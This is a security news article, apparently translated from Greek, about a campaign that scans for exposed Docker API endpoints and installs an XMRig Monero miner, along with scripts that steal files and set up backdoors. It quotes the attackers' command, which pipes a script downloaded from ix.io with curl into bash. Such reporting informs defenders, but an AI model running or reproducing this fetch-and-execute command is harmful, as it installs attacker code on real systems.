Tuesday, July 14, 11:35
Home security Hackers install cryprominer on Docker platforms with exposed API endpoints

Hackers install cryprominer on Docker platforms with exposed API endpoints

Docker platformsResearchers have found that a hacking team scans it en masse Internet looking for Docker platforms that have API endpoints exposed online.

Hackers make scans in order to develop one cryptominer on exposed Docker platforms and steal money.

Professionals behind her hacking campaign

According to researchers, the mass scanning campaign launched on the weekend of November 24. It immediately caught the researchers' attention because of its vast area.

Troy Mursch, lead researcher and co-founder of Bad Packets LLC, said that exploiting exposed Docker platforms is nothing new. It happens often.

“What set this campaign apart was the wide scan range. This in itself required further research to find out where this was targeted botnet"He said.

What information do we have so far?

For now, researchers have discovered that the hacking team, responsible for this campaign, has already scanned more than 59.000 IP networks (netblocks) looking for exposed Docker platforms.

If a vulnerable machine is detected, the hackers use the endpoint API to start one Alpine Linux OS container, where they execute the following command:

chroot / mnt / bin / sh -c 'curl-sL4 http://ix.io/1XQa | bash;

This command downloads and executes one Bash script from the intruder server. This script then installs one crypotminer XMRRig. According to Mursch, during the weekend, hackers stole 14,82 coins Monero (XMR), worth just 740 dollars.

Another thing that researchers have noticed is that malicious software that the hackers install, has one self-defense measure.

“One unique but interesting function of this campaign is that it does uninstall known monitoring programs and "kill" various processes, via a script downloaded from http: // ix [.] io / 1XQh, ”Mursch said.

This script disables products security, and processes related to cryptomining botnet rivals, such as DDG.

In addition, Mursch discovered that the malicious script has another function, which scans the infected computer by searching rConfig configuration files. The script encrypts and steals them archives and sends them to the attackers' command and control server.

Craig H. Rowland, founder of Sandfly Security, also noted that hackers create backdoor accounts in hacked containers and leave behind SSH keys to make them easier access and be able to remotely control all infected bots.

At present, Mursch proposes to all of them users and companies running Docker platforms to check if there are exposed API endpoints on the Internet and to act immediately.


Please enter your comment!
Please enter your name here

Absent Mia
Absent Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greatest achievement


SAP: Critical error allows hackers to seize corporate servers

SAP has released a patch for a critical bug that affects most of its customers. This error, which ...

New strain of Mirai botnet affects Comtrend routers

A new strain of the Mirai Internet of Things (IoT) botnet could be exploited by malicious agents to attack Comtrend routers.

AgeLocker ransomware: Utilizes Google's encryption tool

A new ransomware called AgeLocker uses the "Age" encryption tool, created by an employee of ...

MGM Resorts: Hacker sells data to 142 million customers on the dark web

The data breach of MGM Resorts, which took place in 2019, is much bigger than ...

Ryzen 7 1700 vs. Ryzen 3 3300X: 8 cores vs. 4

AMD's favorite classic old generation, Ryzen 7 1700, is being tested and compared to its direct competitor, the 4-core Ryzen 3 ...

Browser War: Safari and Edge threaten Chrome

The new Edge browser, released for Windows 10 Home and now available for download on Mac, is based on Chromium, which ...

PC sales worldwide have increased due to coronavirus

The outbreak of the coronavirus pandemic has affected all areas of our lives. After health and other industries have been hit ...

MIT: They make a robot handle that will be able to distinguish cables!

MIT researchers have developed a robot handle with the ability to handle very thin objects such as ropes and cables, according to a statement.

Fedora 33: Will contain Nano as the default text editor

Have you ever thought, who is your favorite text editor, when we talk about operating systems based on ...

Hacker was selling databases of the Ukrainian government

A Ukrainian hacker has been arrested for selling confidential information collected from Ukrainian government databases. According to a ...